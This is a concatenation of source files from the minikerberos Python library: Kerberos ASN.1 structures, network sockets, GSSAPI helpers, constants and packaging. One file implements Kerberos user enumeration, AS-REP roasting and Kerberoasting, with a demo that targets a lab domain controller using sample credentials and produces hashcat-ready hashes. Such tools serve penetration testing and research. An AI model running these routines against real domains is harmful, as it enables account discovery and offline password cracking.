		('renew-till', KerberosTime , {'tag_type': TAG, 'tag': 7, 'optional': True}),
		('srealm', Realm , {'tag_type': TAG, 'tag': 8, 'optional': True}),
		('sname', PrincipalName , {'tag_type': TAG, 'tag': 9, 'optional': True}),
		('caddr', HostAddresses , {'tag_type': TAG, 'tag': 10, 'optional': True}),
	]
	
class SequenceOfKrbCredInfo(core.SequenceOf):
	_child_spec = KrbCredInfo
	
class EncKrbCredPart(core.Sequence):
	explicit = (APPLICATION, 29)
	_fields = [
		('ticket-info', SequenceOfKrbCredInfo, {'tag_type': TAG, 'tag': 0}),
		('nonce', krb5int32, {'tag_type': TAG, 'tag': 1, 'optional': True}),
		('timestamp', KerberosTime , {'tag_type': TAG, 'tag': 2, 'optional': True}),
		('usec', krb5int32 , {'tag_type': TAG, 'tag': 3, 'optional': True}),
		('s-address', HostAddress , {'tag_type': TAG, 'tag': 4, 'optional': True}),
		('r-address', HostAddress , {'tag_type': TAG, 'tag': 5, 'optional': True}),
	]

class KRB_ERROR(core.Sequence):
	explicit = (APPLICATION, 30)
	_fields = [
		('pvno', krb5int32, {'tag_type': TAG, 'tag': 0}),
		('msg-type',krb5int32 , {'tag_type': TAG, 'tag': 1}), #MESSAGE_TYPE
		('ctime', KerberosTime , {'tag_type': TAG, 'tag': 2, 'optional': True}),
		('cusec', krb5int32 , {'tag_type': TAG, 'tag': 3, 'optional': True}),
		('stime', KerberosTime , {'tag_type': TAG, 'tag': 4}),
		('susec', krb5int32 , {'tag_type': TAG, 'tag': 5}),
		('error-code', krb5int32 , {'tag_type': TAG, 'tag': 6}),
		('crealm', Realm , {'tag_type': TAG, 'tag': 7, 'optional': True}),
		('cname', PrincipalName , {'tag_type': TAG, 'tag': 8, 'optional': True}),
		('realm', Realm , {'tag_type': TAG, 'tag': 9}),
		('sname', PrincipalName , {'tag_type': TAG, 'tag': 10}),
		('e-text', core.GeneralString , {'tag_type': TAG, 'tag': 11, 'optional': True}),
		('e-data', core.OctetString , {'tag_type': TAG, 'tag': 12, 'optional': True}),
	]

class ChangePasswdDataMS(core.Sequence):
	_fields = [
		('newpasswd', core.OctetString, {'tag_type': TAG, 'tag': 0}),
		('targname', PrincipalName, {'tag_type': TAG, 'tag': 1, 'optional': True}),
		('targrealm', Realm , {'tag_type': TAG, 'tag': 2, 'optional': True}),
	]

class EtypeList(core.SequenceOf):
	#-- the client's proposed enctype list in
	#-- decreasing preference order, favorite choice first
	_child_spec = ENCTYPE

	
class KerberosResponse(core.Choice):
	_alternatives = [
		('AS_REP', AS_REP, {'implicit': (APPLICATION,11) }  ),
		('TGS_REP', TGS_REP, {'implicit': (APPLICATION,13) }  ),
		('KRB_ERROR', KRB_ERROR, {'implicit': (APPLICATION,30) } ),
	]
	
	
class KRBCRED(core.Sequence):
	explicit = (APPLICATION, 22)
	
	_fields = [
		('pvno', core.Integer, {'tag_type': TAG, 'tag': 0}),
		('msg-type', core.Integer, {'tag_type': TAG, 'tag': 1}),
		('tickets', SequenceOfTicket, {'tag_type': TAG, 'tag': 2}),
		('enc-part', EncryptedData , {'tag_type': TAG, 'tag': 3}),
	
	]

#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/aceb70de-40f0-4409-87fa-df00ca145f5a
#other name: PA-S4U2Self
class PA_FOR_USER_ENC(core.Sequence): 
	_fields = [
		('userName', PrincipalName, {'tag_type': TAG, 'tag': 0}),
		('userRealm', Realm, {'tag_type': TAG, 'tag': 1}),
		('cksum', Checksum, {'tag_type': TAG, 'tag': 2}),
		('auth-package', KerberosString , {'tag_type': TAG, 'tag': 3}),
	
	]
	
class S4UUserIDOptions(core.BitString):
	_map = {
		0x40000000 : 'check-logon-hour', #This option causes the KDC to check logon hour restrictions for the user.
		0x20000000 : 'signed-with-kun-27', #In a request, asks the KDC to sign the reply with key usage number 27. In a reply, indicates that it was signed with key usage number 27.
	}

#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/cd9d5ca7-ce20-4693-872b-2f5dd41cbff6
class S4UUserID(core.Sequence):
	_fields = [
		('nonce', core.Integer, {'tag_type': TAG, 'tag': 0}), #-- the nonce in KDC-REQ-BODY
		('cname', PrincipalName, {'tag_type': TAG, 'tag': 1, 'optional' : True}),
		#-- Certificate mapping hints
		('crealm', Realm, {'tag_type': TAG, 'tag': 2}),
		('subject-certificate', core.OctetString, {'tag_type': TAG, 'tag': 3, 'optional' : True}),
		('options', S4UUserIDOptions, {'tag_type': TAG, 'tag': 4, 'optional' : True}),
	]
	
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/cd9d5ca7-ce20-4693-872b-2f5dd41cbff6
class PA_S4U_X509_USER(core.Sequence):
	_fields = [
		('user-id', S4UUserID, {'tag_type': TAG, 'tag': 0}),
		('checksum', Checksum, {'tag_type': TAG, 'tag': 1}),	
	]

class AD_IF_RELEVANT(AuthorizationData):
	pass


class GSSAPIOID(core.ObjectIdentifier):
	_map = {
		'1.2.840.113554.1.2.2': 'krb5',
	}

	_reverse_map = {
		'krb5': '1.2.840.113554.1.2.2',
	}


class GSSAPIToken(core.Asn1Value):
	class_ = 1
	tag = 0
	method = 1





import socket

from minikerberos.protocol.asn1_structs import KerberosResponse
from minikerberos.common.constants import KerberosSocketType
from minikerberos.protocol.errors import KerberosErrorCode, KerberosError


class KerberosClientSocket:
	def __init__(self, target):
		self.target = target
		#ip, port = 88, soc_type = KerberosSocketType.TCP
		self.soc_type = target.protocol
		self.dst_ip = target.ip
		self.dst_port = int(target.port)
		self.soc = None
		
	def __str__(self):
		t = '===KerberosClientSocket===\r\n'
		t += 'soc_type: %s\r\n' % self.soc_type
		t += 'dst_ip: %s\r\n' % self.dst_ip
		t += 'dst_port: %s\r\n' % self.dst_port
		
		return t

	def get_addr_str(self):
		return '%s:%d' % (self.dst_ip, self.dst_port)
		
	def create_soc(self):
		if self.soc_type == KerberosSocketType.TCP:
			self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
			self.soc.connect((self.dst_ip, self.dst_port))

		elif self.soc_type == KerberosSocketType.UDP:
			self.soc = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
			
		else:
			raise Exception('Unknown socket type!')
			
	def sendrecv(self, data, throw = True):
		#throw variable indicates wether to create an exception when a kerberos error happens or just return the kerberos error"
		#for any other exceptions types (eg. connection related errors) an exception will be raised regardless

		self.create_soc()
		try:
			if self.soc_type == KerberosSocketType.TCP:
				length = len(data).to_bytes(4, byteorder = 'big', signed = False)
				self.soc.sendall(length + data)
				buff = b''
				total_length = -1
				while True:
					temp = b''
					temp = self.soc.recv(4096)
					if temp == b'':
						break
					buff += temp
					if total_length == -1:
						if len(buff) > 4:
							total_length = int.from_bytes(buff[:4], byteorder = 'big', signed = False)
							if total_length == 0:
								raise Exception('Returned data length is 0! This means the server did not understand our message')
					
					if total_length != -1:
						if len(buff) == total_length + 4:
							buff = buff[4:]
							break
						elif len(buff) > total_length + 4:
							raise Exception('Got too much data somehow')
						else:
							continue
							
				
			elif self.soc_type == KerberosSocketType.UDP:
				self.soc.sendto(data, (self.dst_ip, self.dst_port))
				while True:
					buff, addr = self.soc.recvfrom(65535)
					if addr[0] == self.dst_ip:
						break
					else:
						# got a message from a different IP than the target, strange!
						# continuing, but this might result in an infinite loop
						continue
			if buff == b'':
				raise Exception('Server closed the connection!')
			krb_message = KerberosResponse.load(buff)
			if krb_message.name == 'KRB_ERROR' and throw == True:
				raise KerberosError(krb_message)
			return krb_message
		finally:
			self.soc.close()



#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import asyncio

from minikerberos.protocol.asn1_structs import KerberosResponse
from minikerberos.common.constants import KerberosSocketType

from asysocks.client import SOCKSClient
from asysocks.common.comms import SocksQueueComms

class AIOKerberosClientSocksSocket:
	def __init__(self, target):
		self.target = target
		self.out_queue = None
		self.in_queue = None

		self.proxy_client = None
		self.proxy_task = None
		
	def get_addr_str(self):
		return '%s:%d' % (self.target.ip, self.target.port)

	async def sendrecv(self, data):
		self.out_queue = asyncio.Queue()
		self.in_queue = asyncio.Queue()
		comms = SocksQueueComms(self.out_queue, self.in_queue)

		self.client = SOCKSClient(comms, self.target.proxy.target)
		self.proxy_task = asyncio.create_task(self.client.run())

		length = len(data).to_bytes(4, byteorder = 'big', signed = False)
		await self.out_queue.put(length+data)

		resp_data = b''
		resp_data_len = -1
		while True:
			data, err = await self.in_queue.get()
			if data is None:
				break
			if err is not None:
				raise err
			resp_data += data
			if resp_data_len == -1:
				if len(resp_data) > 4:
					resp_data_len = int.from_bytes(resp_data[:4], byteorder = 'big', signed = False)
					if resp_data_len == 0:
						raise Exception('Returned data length is 0! This means the server did not understand our message')
			
			if resp_data_len != -1:
				if len(resp_data) == resp_data_len + 4:
					resp_data = resp_data[4:]
					break
				elif len(resp_data) > resp_data_len + 4:
					raise Exception('Got too much data somehow')
				else:
					continue
		
		await self.out_queue.put(None)
		if resp_data == b'':
			raise Exception('Connection returned no data!')
		
		krb_message = KerberosResponse.load(resp_data)
		return krb_message

		
	def __str__(self):
		t = '===AIOKerberosClientProxySocket AIO===\r\n'
		t += 'target: %s\r\n' % self.target
		
		return t


import io
import enum
import base64

from minikerberos.protocol.asn1_structs import GSSAPIOID, GSSAPIToken

#https://tools.ietf.org/html/rfc4121#section-4.1.1.1
class ChecksumFlags(enum.IntFlag):
	GSS_C_DELEG_FLAG = 1
	GSS_C_MUTUAL_FLAG = 2
	GSS_C_REPLAY_FLAG = 4
	GSS_C_SEQUENCE_FLAG = 8
	GSS_C_CONF_FLAG = 16
	GSS_C_INTEG_FLAG = 32
	GSS_C_DCE_STYLE = 0x1000
		  
#https://tools.ietf.org/html/rfc4121#section-4.1.1
class AuthenticatorChecksum:
	def __init__(self):
		self.length_of_binding = None
		self.channel_binding = None #MD5 hash of gss_channel_bindings_struct
		self.flags = None #ChecksumFlags
		self.delegation = None
		self.delegation_length = None
		self.delegation_data = None
		self.extensions = None
		
	@staticmethod
	def from_bytes(data):
		return AuthenticatorChecksum.from_buffer(io.BytesIO(data))
		
	@staticmethod
	def from_buffer(buffer):
		ac = AuthenticatorChecksum()
		ac.length_of_binding = int.from_bytes(buffer.read(4), byteorder = 'little', signed = False)
		ac.channel_binding = buffer.read(ac.length_of_binding) #according to the latest RFC this is 16 bytes long always
		ac.flags = ChecksumFlags(int.from_bytes(buffer.read(4), byteorder = 'little', signed = False))
		if ac.flags & ChecksumFlags.GSS_C_DELEG_FLAG:
			ac.delegation = bool(int.from_bytes(buffer.read(2), byteorder = 'little', signed = False))
			ac.delegation_length = int.from_bytes(buffer.read(2), byteorder = 'little', signed = False)
			ac.delegation_data = buffer.read(ac.delegation_length)
		ac.extensions = buffer.read()
		return ac
		
		
	def to_bytes(self):
		t = len(self.channel_binding).to_bytes(4, byteorder = 'little', signed = False)
		t += self.channel_binding
		t += self.flags.to_bytes(4, byteorder = 'little', signed = False)
		if self.flags & ChecksumFlags.GSS_C_DELEG_FLAG:
			t += int(self.delegation).to_bytes(2, byteorder = 'little', signed = False)
			t += len(self.delegation_data.to_bytes()).to_bytes(2, byteorder = 'little', signed = False)
			t += self.delegation_data.to_bytes()
		if self.extensions:
			t += self.extensions.to_bytes()
		return t


# KRB5Token TOK_ID values.
class KRB5TokenTokID(enum.IntFlag):
	KRB_AP_REQ = 0x0100
	KRB_AP_REP = 0x0200
	KRB_ERROR = 0x0300

	def get_bytes(self):
		return self.value.to_bytes(2, byteorder='big')


# https://tools.ietf.org/html/rfc4121#section-4.1
class KRB5Token:
	def __init__(self, inner_token):
		self.oid = GSSAPIOID('krb5')
		self.inner_token = inner_token

	def get_apreq_token(self, encoding='utf-8'):
		token = self.oid.dump()
		token += KRB5TokenTokID.KRB_AP_REQ.get_bytes()
		token += self.inner_token
		return str(base64.b64encode(GSSAPIToken(contents=token).dump()), encoding)




import enum
import io

# https://www.ietf.org/rfc/rfc2744.txt   3.11. Channel Bindings

class GSS_C_AF(enum.Enum):
	UNSPEC = 0     #Unspecified address type
	LOCAL = 1      #Host-local address type
	INET = 2       #Internet address type (e.g. IP)
	IMPLINK = 3    #ARPAnet IMP address type
	PUP = 4        #pup protocols (eg BSP) address type
	CHAOS = 5      #MIT CHAOS protocol address type
	NS = 6         #XEROX NS address type
	NBS = 7        #nbs address type
	ECMA  = 8      #ECMA address type
	DATAKIT = 9    #datakit protocols address type
	CCITT = 10     #CCITT protocols
	SNA = 11       #IBM SNA address type
	DECnet = 12    #DECnet address type
	DLI = 13       #Direct data link interface address type
	LAT = 14       #LAT address type
	HYLINK = 15    #NSC Hyperchannel address type
	APPLETALK= 16  #AppleTalk address type
	BSC = 17       #BISYNC 2780/3780 address type
	DSS = 18       #Distributed system services address type
	OSI = 19       #OSI TP4 address type
	X25 = 21       #X.25
	NULLADDR = 255 #No address specified

class ChannelBindingsStruct:
	def __init__(self):
		self.initiator_addrtype = None #GSS_C_AF
		self.initiator_address = None #bytes
		self.acceptor_addrtype = None #GSS_C_AF
		self.acceptor_address = None #bytes
		self.application_data = None #bytes

	@staticmethod
	def from_bytes(data):
		return ChannelBindingsStruct.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		# TODO: parse the addresses
		cb = ChannelBindingsStruct()
		t = buff.read(8)
		if t != b'\x00' * 8:
			cb.initiator_addrtype = GSS_C_AF(int.from_bytes(t, byteorder='little', signed = False))
			initiator_address_length = int.from_bytes(buff.read(4), byteorder='little', signed = False)
			cb.initiator_address  = buff.read(initiator_address_length)
		t = buff.read(8)
		if t != b'\x00' * 8:
			cb.acceptor_addrtype  = GSS_C_AF(int.from_bytes(buff.read(4), byteorder='little', signed = False))
			acceptor_address_length = int.from_bytes(buff.read(4), byteorder='little', signed = False)
			cb.acceptor_address   = buff.read(acceptor_address_length)
		t = buff.read(8)
		if t != b'\x00' * 8:
			application_data_length = int.from_bytes(buff.read(4), byteorder='little', signed = False)
			cb.application_data   = buff.read(application_data_length)
		return cb

	def to_bytes(self):
		if self.initiator_address is None:
			t = b'\x00' * 8
		else:
			t = self.initiator_addrtype.value.to_bytes(4, byteorder='little', signed = False)
			t += len(self.initiator_address).to_bytes(4, byteorder='little', signed = False)
			t += self.initiator_address
		if self.acceptor_address is None:
			t += b'\x00' * 8
		else:
			t += self.acceptor_addrtype
			t += len(self.acceptor_address).to_bytes(4, byteorder='little', signed = False)
			t += self.acceptor_address
		if self.application_data is None:
			t += b'\x00' * 8
		else:
			t += len(self.application_data).to_bytes(4, byteorder='little', signed = False)
			t += self.application_data
		return t


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import datetime
import secrets

from minikerberos import logger
from minikerberos.aioclient import AIOKerberosClient
from minikerberos.common.spn import KerberosSPN
from minikerberos.common.target import KerberosTarget
from minikerberos.common.creds import KerberosCredential
from minikerberos.common.utils import TGSTicket2hashcat, TGTTicket2hashcat
from minikerberos import logger
from minikerberos.protocol.asn1_structs import PrincipalName, KDCOptions, \
	PADATA_TYPE, PA_PAC_REQUEST, krb5_pvno, KDC_REQ_BODY, AS_REQ

from minikerberos.protocol.errors import KerberosErrorCode
from minikerberos.protocol.constants import NAME_TYPE, MESSAGE_TYPE
from minikerberos.network.selector import KerberosClientSocketSelector


class KerberosEtypeTest:
	# TODO: implement this
	pass

class KerberosUserEnum:
	def __init__(self, target: KerberosTarget, spn: KerberosSPN):
		self.target = target
		self.spn = spn
		self.ksoc = KerberosClientSocketSelector.select(target, True)


	def construct_tgt_req(self):
		now = now = datetime.datetime.now(datetime.timezone.utc)
		kdc_req_body = {}
		kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
		kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.spn.username]})
		kdc_req_body['realm'] = self.spn.domain.upper()
		kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.spn.domain.upper()]})
		kdc_req_body['till']  = (now + datetime.timedelta(days=1)).replace(microsecond=0)
		kdc_req_body['rtime'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)
		kdc_req_body['nonce'] = secrets.randbits(31)
		kdc_req_body['etype'] = [2, 3, 16, 23, 17, 18] #we "support" all MS related enctypes
		
		pa_data_1 = {}
		pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
		pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
		
		kdc_req = {}
		kdc_req['pvno'] = krb5_pvno
		kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
		kdc_req['padata'] = [pa_data_1]
		kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
		
		return AS_REQ(kdc_req)

	async def run(self):
		req = self.construct_tgt_req()

		rep = await self.ksoc.sendrecv(req.dump(), throw = False)

		if rep.name != 'KRB_ERROR':	
			# user doesnt need preauth, but it exists
			return True
			
		elif rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
			# any other error means user doesnt exist
			return False
			
		else:
			# preauth needed, only if user exists
			return True

class APREPRoast:
	def __init__(self, target: KerberosTarget):
		self.target = target

	async def run(self, cred: KerberosCredential, override_etype = [23]):
		"""
		override_etype: list : list of supported encryption types
		"""
		try:
			kcomm = AIOKerberosClient(cred, self.target)
			await kcomm.get_TGT(override_etype = override_etype, decrypt_tgt = False)
			return TGTTicket2hashcat(kcomm.kerberos_TGT)
		except Exception as e:
			logger.debug('Error while roasting client %s/%s Reason: %s' % (cred.domain, cred.username, str(e)))
			raise e

class Kerberoast:
	def __init__(self, target: KerberosTarget, cred: KerberosCredential):
		self.target = target
		self.cred = cred

	async def run(self, spns, override_etype = [2, 3, 16, 23, 17, 18]):
		try:
			kcomm = AIOKerberosClient(self.cred, self.target)
			await kcomm.get_TGT(override_etype = override_etype, decrypt_tgt = False)
		except Exception as e:
			logger.exception('a')
			logger.debug('Error logging in! Reason: %s' % (str(e)))
			raise e

		results = []
		for spn in spns:
			try:
				tgs, _, _ = await kcomm.get_TGS(spn, override_etype = override_etype)
				results.append(TGSTicket2hashcat(tgs))
			except Exception as e:
				logger.exception('b')
				logger.debug('Failed to get TGS ticket for user %s/%s/%s! Reason: %s' % (spn.domain, str(spn.service), spn.username, str(e)))
				continue

		return results

async def main():
	url = 'kerberos+pw://teas\\test:pass@10.10.10.2'
	ku = KerberosClientURL.from_url(url)
	target_user = 'asdadfadsf@TEST.corp'
	target = ku.get_target()
	print(target)
	spn = KerberosSPN.from_user_email(target_user)
	ue = KerberosUserEnum(target, spn)
	res = await ue.run()
	print(res)
	
	url = 'kerberos+pw://TEST\\asreptest:pass@10.10.10.2'
	ku = KerberosClientURL.from_url(url)
	target = ku.get_target()
	cred = ku.get_creds()
	arr = APREPRoast(target)
	res = await arr.run(cred)
	print(res)


	target_user = 'srv_http@TEST.corp'
	spn = KerberosSPN.from_user_email(target_user)
	url = 'kerberos+pw://TEST\\victim:Passw0rd!1@10.10.10.2/?timeout=77'
	ku = KerberosClientURL.from_url(url)
	target = ku.get_target()
	cred = ku.get_creds()
	arr = Kerberoast(target, cred)
	res = await arr.run([spn])
	print(res)

	target_user = 'srv_http@TEST.corp'
	spn = KerberosSPN.from_user_email(target_user)
	url = 'kerberos+pw://TEST\\victim:Passw0rd!1@10.10.10.2/?proxyhost=10.10.10.102&proxytype=socks5&proxyport=1080'
	ku = KerberosClientURL.from_url(url)
	target = ku.get_target()
	print(target)
	cred = ku.get_creds()
	arr = Kerberoast(target, cred)
	res = await arr.run([spn])
	print(res)

if __name__ == '__main__':
	from asysocks import logger as alogger
	from minikerberos.common.url import KerberosClientURL
	import asyncio
	alogger.setLevel(2)
	asyncio.run(main())
	



from minikerberos.common.constants import KerberosSocketType

class KerberosTarget:
	def __init__(self, ip = None):
		self.ip = ip
		self.port = 88
		self.protocol = KerberosSocketType.TCP
		self.proxy = None
		self.timeout = 10

	def __str__(self):
		t = '===KerberosTarget===\r\n'
		t += 'ip: %s\r\n' % self.ip
		t += 'port: %s\r\n' % self.port
		t += 'protocol: %s\r\n' % self.protocol.name
		t += 'timeout: %s\r\n' % self.timeout
		t += 'proxy: %s\r\n' % str(self.proxy)
		return t



from minikerberos.network.clientsocket import KerberosClientSocket
from minikerberos.network.aioclientsocket import AIOKerberosClientSocket
from minikerberos.network.aioclientsockssocket import AIOKerberosClientSocksSocket

class KerberosClientSocketSelector:
    def __init__(self):
        pass
    
    @staticmethod
    def select(target, is_async = False):
        if is_async is False:
            return KerberosClientSocket(target)
        else:
            if target.proxy is not None:
                return AIOKerberosClientSocksSocket(target)
            else:
                return AIOKerberosClientSocket(target)


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import enum

class NAME_TYPE(enum.Enum):
	UNKNOWN = 0     #(0),	-- Name type not known
	PRINCIPAL = 1     #(1),	-- Just the name of the principal as in
	SRV_INST = 2     #(2),	-- Service and other unique instance (krbtgt)
	SRV_HST = 3     #(3),	-- Service with host name as instance
	SRV_XHST = 4     # (4),	-- Service with host as remaining components
	UID = 5     # (5),		-- Unique ID
	X500_PRINCIPAL = 6     #(6), -- PKINIT
	SMTP_NAME = 7     #(7),	-- Name in form of SMTP email name
	ENTERPRISE_PRINCIPAL = 10    #(10), -- Windows 2000 UPN
	WELLKNOWN  = 11    #(11),	-- Wellknown
	ENT_PRINCIPAL_AND_ID  = -130  #(-130), -- Windows 2000 UPN and SID
	MS_PRINCIPAL = -128  #(-128), -- NT 4 style name
	MS_PRINCIPAL_AND_ID = -129  #(-129), -- NT style name and SID
	NTLM = -1200 #(-1200) -- NTLM name, realm is domain

class MESSAGE_TYPE(enum.Enum):
	KRB_AS_REQ = 10 
	KRB_AS_REP = 11 
	KRB_TGS_REQ = 12 
	KRB_TGS_REP = 13 
	KRB_AP_REQ = 14 
	KRB_AP_REP = 15 
	KRB_SAFE = 20 
	KRB_PRIV = 21 
	KRB_CRED = 22 
	KRB_ERROR = 30 

class EncryptionType(enum.Enum):
	NULL = 0#
	DES_CBC_CRC = 1#
	DES_CBC_MD4 = 2#
	DES_CBC_MD5 = 3#
	DES3_CBC_MD5 = 5#
	OLD_DES3_CBC_SHA1 = 7#
	SIGN_DSA_GENERATE = 8#
	ENCRYPT_RSA_PRIV = 9#
	ENCRYPT_RSA_PUB = 10#
	DES3_CBC_SHA1 = 16#	-- with key derivation
	AES128_CTS_HMAC_SHA1_96 = 17#
	AES256_CTS_HMAC_SHA1_96 = 18#
	ARCFOUR_HMAC_MD5 = 23#
	ARCFOUR_HMAC_MD5_56 = 24#
	ENCTYPE_PK_CROSS = 48#
	ARCFOUR_MD4 = -128#
	ARCFOUR_HMAC_OLD = -133#
	ARCFOUR_HMAC_OLD_EXP = -135#
	DES_CBC_NONE = -0x1000#
	DES3_CBC_NONE = -0x1001#
	DES_CFB64_NONE = -0x1002#
	DES_PCBC_NONE = -0x1003#
	DIGEST_MD5_NONE = -0x1004#		-- private use, lukeh@padl.com
	CRAM_MD5_NONE = -0x1005#		-- private use, lukeh@padl.com
	
	
class PaDataType(enum.Enum):
	NONE = 0#
	TGS_REQ = 1#
	AP_REQ = 1#
	ENC_TIMESTAMP = 2#
	PW_SALT = 3#
	ENC_UNIX_TIME = 5#
	SANDIA_SECUREID = 6#
	SESAME = 7#
	OSF_DCE = 8#
	CYBERSAFE_SECUREID = 9#
	AFS3_SALT = 10#
	ETYPE_INFO = 11#
	SAM_CHALLENGE = 12# __  = sam/otp)
	SAM_RESPONSE = 13# __  = sam/otp)
	PK_AS_REQ_19 = 14# __  = PKINIT_19)
	PK_AS_REP_19 = 15# __  = PKINIT_19)
	PK_AS_REQ_WIN = 15# __  = PKINIT _ old number)
	PK_AS_REQ = 16# __  = PKINIT_25)
	PK_AS_REP = 17# __  = PKINIT_25)
	PA_PK_OCSP_RESPONSE = 18#
	ETYPE_INFO2 = 19#
	USE_SPECIFIED_KVNO = 20#
	SVR_REFERRAL_INFO = 20# ___ old ms referral number
	SAM_REDIRECT = 21# __  = sam/otp)
	GET_FROM_TYPED_DATA = 22#
	SAM_ETYPE_INFO = 23#
	SERVER_REFERRAL = 25#
	ALT_PRINC = 24#		__  = crawdad@fnal.gov)
	SAM_CHALLENGE2 = 30#		__  = kenh@pobox.com)
	SAM_RESPONSE2 = 31#		__  = kenh@pobox.com)
	PA_EXTRA_TGT = 41#			__ Reserved extra TGT
	TD_KRB_PRINCIPAL = 102#	__ PrincipalName
	PK_TD_TRUSTED_CERTIFIERS = 104# __ PKINIT
	PK_TD_CERTIFICATE_INDEX = 105# __ PKINIT
	TD_APP_DEFINED_ERROR = 106#	__ application specific
	TD_REQ_NONCE = 107#		__ INTEGER
	TD_REQ_SEQ = 108#		__ INTEGER
	PA_PAC_REQUEST = 128#	__ jbrezak@exchange.microsoft.com
	FOR_USER = 129#		__ MS_KILE
	FOR_X509_USER = 130#		__ MS_KILE
	FOR_CHECK_DUPS = 131#	__ MS_KILE
	AS_CHECKSUM = 132#		__ MS_KILE
	PK_AS_09_BINDING = 132#	__ client send this to __ tell KDC that is supports __ the asCheckSum in the __  PK_AS_REP
	CLIENT_CANONICALIZED = 133#	__ referals
	FX_COOKIE = 133#		__ krb_wg_preauth_framework
	AUTHENTICATION_SET = 134#	__ krb_wg_preauth_framework
	AUTH_SET_SELECTED = 135#	__ krb_wg_preauth_framework
	FX_FAST = 136#		__ krb_wg_preauth_framework
	FX_ERROR = 137#		__ krb_wg_preauth_framework
	ENCRYPTED_CHALLENGE = 138#	__ krb_wg_preauth_framework
	OTP_CHALLENGE = 141#		__  = gareth.richards@rsa.com)
	OTP_REQUEST = 142#		__  = gareth.richards@rsa.com)
	OTP_CONFIRM = 143#		__  = gareth.richards@rsa.com)
	OTP_PIN_CHANGE = 144#	__  = gareth.richards@rsa.com)
	EPAK_AS_REQ = 145#
	EPAK_AS_REP = 146#
	PKINIT_KX = 147#		__ krb_wg_anon
	PKU2U_NAME = 148#		__ zhu_pku2u
	REQ_ENC_PA_REP = 149#	__
	SPAKE = 151#	__https://datatracker.ietf.org/doc/draft-ietf-kitten-krb-spake-preauth/?include_text=1
	SUPPORTED_ETYPES = 165 #)	__ MS_KILE


# Full list of key_usage numbers: https://tools.ietf.org/html/rfc4120#section-7.5.1
# 
class KEY_USAGE(enum.Enum):
	AS_REQ_PA_ENC_TS = 1
	KDC_REP_TICKET = 2
	AS_REP_ENCPART = 3
	TGS_REQ_AD_SESSKEY = 4
	TGS_REQ_AD_SUBKEY = 5
	TGS_REQ_AUTH_CKSUM = 6
	TGS_REQ_AUTH = 7
	TGS_REP_ENCPART_SESSKEY = 8
	TGS_REP_ENCPART_SUBKEY = 9
	AP_REQ_AUTH_CKSUM = 10
	AP_REQ_AUTH = 11
	AP_REP_ENCPART = 12
	KRB_PRIV_ENCPART = 13
	KRB_CRED_ENCPART = 14
	KRB_SAFE_CKSUM = 15
	APP_DATA_ENCRYPT = 16
	APP_DATA_CKSUM = 17
	KRB_ERROR_CKSUM = 18
	AD_KDCISSUED_CKSUM = 19
	AD_MTE = 20
	AD_ITE = 21

	GSS_TOK_MIC = 22
	GSS_TOK_WRAP_INTEG = 23
	GSS_TOK_WRAP_PRIV = 24

	PA_SAM_CHALLENGE_CKSUM = 25
	#PA_SAM_CHALLENGE_TRACKID  26 #/** Note conflict with @ref KRB5_KEYUSAGE_PA_S4U_X509_USER_REQUEST */
	#PA_SAM_RESPONSE           27 #/** Note conflict with @ref KRB5_KEYUSAGE_PA_S4U_X509_USER_REPLY */
	
	PA_S4U_X509_USER_REQUEST = 26 #/* Defined in [MS-SFU] *//** Note conflict with @ref KRB5_KEYUSAGE_PA_SAM_CHALLENGE_TRACKID */
	PA_S4U_X509_USER_REPLY = 27 #/** Note conflict with @ref KRB5_KEYUSAGE_PA_SAM_RESPONSE */

	AD_SIGNEDPATH = -21
	IAKERB_FINISHED = 42
	PA_PKINIT_KX = 44
	PA_OTP_REQUEST = 45 

	FAST_REQ_CHKSUM = 50
	FAST_ENC = 51
	FAST_REP = 52
	FAST_FINISHED = 53
	ENC_CHALLENGE_CLIENT = 54
	ENC_CHALLENGE_KDC = 55
	AS_REQ = 56
	CAMMAC = 64
	SPAKE = 65


from setuptools import setup, find_packages
import re

VERSIONFILE="minikerberos/_version.py"
verstrline = open(VERSIONFILE, "rt").read()
VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"
mo = re.search(VSRE, verstrline, re.M)
if mo:
    verstr = mo.group(1)
else:
    raise RuntimeError("Unable to find version string in %s." % (VERSIONFILE,))

setup(
	# Application name:
	name="minikerberos",

	# Version number (initial):
	version=verstr,

	# Application author details:
	author="Tamas Jos",
	author_email="info@skelsec.com",

	# Packages
	packages=find_packages(),

	# Include additional files into the package
	include_package_data=True,


	# Details
	url="https://github.com/skelsec/minikerberos",

	zip_safe=True,
	#
	# license="LICENSE.txt",
	description="Kerberos manipulation library in pure Python",

	# long_description=open("README.txt").read(),
	python_requires='>=3.6',
	classifiers=(
		"Programming Language :: Python :: 3.6",
		"License :: OSI Approved :: MIT License",
		"Operating System :: OS Independent",
	),
	install_requires=[
		'asn1crypto>=1.3.0',
		'asysocks>=0.0.11',
	],

	entry_points={
		'console_scripts': [
			'ccacheedit = minikerberos.examples.ccache_editor:main',
			'kirbi2ccache = minikerberos.examples.kirbi2ccache:main',
			'ccache2kirbi = minikerberos.examples.ccache2kirbi:main',
			'ccacheroast = minikerberos.examples.ccacheroast:main',
			'getTGT = minikerberos.examples.getTGT:main',
			'getTGS = minikerberos.examples.getTGS:main',
			'getS4U2proxy = minikerberos.examples.getS4U2proxy:main',
		],
	}
)



#!/usr/bin/env python3
